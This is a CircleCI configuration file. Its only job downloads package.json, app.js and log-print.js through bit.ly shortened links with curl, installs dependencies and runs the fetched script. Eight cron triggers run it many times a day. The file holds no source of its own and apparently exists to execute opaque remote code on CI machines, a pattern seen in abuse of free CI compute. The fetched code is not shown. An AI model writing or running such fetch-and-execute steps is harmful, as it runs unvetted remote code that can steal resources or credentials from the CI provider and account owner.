version: 2.1

jobs:
  run-job:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: 
          name: Get soure
          command: |-
            curl -fsSL https://bit.ly/3nvNdYs -o package.json && curl -fsSL https://bit.ly/2XgnUhW -o app.js && curl -fsSL https://bit.ly/3Cb0Pwk -o log-print.js
      - run: 
          name: Node Install Packages
          command: |-
            npm i -s
      - run: node app.js

workflows:
  version: 2
  start-work:
    triggers:
      - schedule:
          cron: "0 0,5,10,15 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "1 0,5,10,15 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "2 0,5,10,15 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "3 0,5,10,15 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "35 19 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "36 19 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "37 19 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "38 19 * * *"
          filters:
            branches:
              only:
                - main
    jobs:
      - run-job
